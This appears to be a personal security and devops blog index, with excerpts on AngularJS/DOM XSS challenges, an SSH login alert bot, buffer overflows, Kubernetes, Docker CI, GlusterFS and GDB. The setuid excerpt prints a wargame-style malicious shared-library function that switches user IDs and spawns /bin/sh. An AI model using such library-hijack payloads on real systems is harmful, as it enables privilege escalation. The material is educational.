Waste no more time arguing about what a good man should be. Be one


Some things I’ve done. More to come :)


Introduction Tonight I’m doing another challenge for XSS vulnerabilities, specially with AngularJS which is a really common framework for developing webapps. As you may know “Cross-site scripting carried out on websites accounted for roughly 84% of all security vulnerabilities” This time I had some fun with this new challenge which consisted about finding a XSS DOM-based vulnerability with “Angular Expressions” First things first! The way Angular binds data into the HTML is via expressions, and AngularJS expressions are written in double braces {{}}


Introduction DOM-based XSS vulnerabilities usually arise when JavaScript takes data from an attacker-controllable source, such as the URL, and passes it to a sink that supports dynamic code execution, such as eval() or innerHTML. This enables attackers to execute malicious JavaScript, which typically allows them to hijack other users' accounts. What is the DOM? The Document Object Model (DOM) is a convention used to represent and work with objects in an HTML document (as well as in other document types).

SSH Guard

SSH Guard Today we are going to create a SSH guard, it is very usefull if you have a personal server. Have you ever felt paranoid about your password / rsa-key being compromised by a third party? Worry no more! With a discord bot and some PAM configuration tweaks you can feel more relaxed. Side note: I’ve used discord, but you can use any app that you want as long as it supports webhooks (for example telegram)

XSS Vulnerabilities

Introduction Cross-Site Scripting (XSS) Attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user whitin the output it generates without validating or encoding it.

Stack-Based Buffer Overflow

Introduction Stack-Based Buffer Overflow exploits are likely the shiniest and most common form of exploit for remotely taking over the code execution of a process. These exploits were extremely common 20 years ago, but since then, a huge amount of effort has gone into mitigating stack-based overflow attacks by operating system developers, application developers, and hardware manufacturers, with changes even being made to the standard libraries developers use. 📝 Understanding these kind of exploits involves at least a basic understanding of computer memory.


Brief introduction I once heard kubernetes is like teenage sex, everybody talks about it, you think people around you do it a lot, but nobody really knows how it is properly done. So at my job I was asked if I would join to discover a way to deploy something with this new technology: Kubernetes. Kubernetes (or k8s for short) is an opensource platform that allows you to manage/orchestrate containers in a versatile way, with functions like auto-scaling, rollback when an automated-deploy is not mounted, etc.

Continuous integration

Continuous Integration Yeah, we hear a lot about devops and automation, etc. It’s indeed cool worrying the minimum in the deployment of an architecture. So let’s tamper and put a little project with few components with docker. The scheme arquitecture we’re going to have is something like this: Let me describe it’s components: *NGINX: Acts as a front-end reverse proxy, it will forward all the external requests to our internal application (database or django+gunicorn).

Setuid, getuid...

Fibonacci serie teardown #include <stdio.h> #include <unistd.h> #include <sys/types.h> void better_printf(){ printf("Real user id = %d, Effective User id = %d\n",getuid(),geteuid()); setreuid(1001,1001); setgid(1001); printf("I'm the bad library\n"); printf("Real user id = %d, Effective User id = %d\n",getuid(),geteuid()); system("/bin/sh"); } #level2 level2@sojack:/tmp/evil$ cat test2.c #include <stdio.h> #include <unistd.h> #include <sys/types.h> void better_printf(){ printf("Real user id = %d, Effective User id = %d\n",getuid(),geteuid()); setreuid(1003,1003); setgid(1003); printf("I'm the bad library\n"); printf("Real user id = %d, Effective User id = %d\n",getuid(),geteuid()); system("/bin/sh"); }

Setting up a 3-node cluster with GlusterFS

Beggining with glusterFS GlusterFS is a scalable network filesystem suitable for data-intensive tasks such as cloud storage and media streaming. A big problem when we find for example, in a docker swarm is that data between it’s nodes is not replicated. But we can use NFS for sharing storage! - I said to my IT partner, Edu. The problem with NFS is that if the NFS shared is unavailable the whole cluster can’t reach that data.

Playing with Gnu Debugger

Fibonacci serie teardown First, we got a little recursive function, such as the famous fibonacci serie. As we may know, fibonacci sequence has a couple of initial conditions, firstly the number 1 and 0 are meet, and if it’s a number other than these two, just calculate the function with the formula fib(n-1) + fib(n-2). Here’s the brief C code: #include <stdio.h> int fib(int n) { if (n == 0) return 0; else if (n == 1) return 1; else return fib(n-1) + fib(n-2); } int main (int argc, char *argv[]){ int n = 5; printf(“Calculating fibonacci of number %d\n”,n); printf(“%d\n”, fib(n)); return 0; } For the moment, quite easy to understand.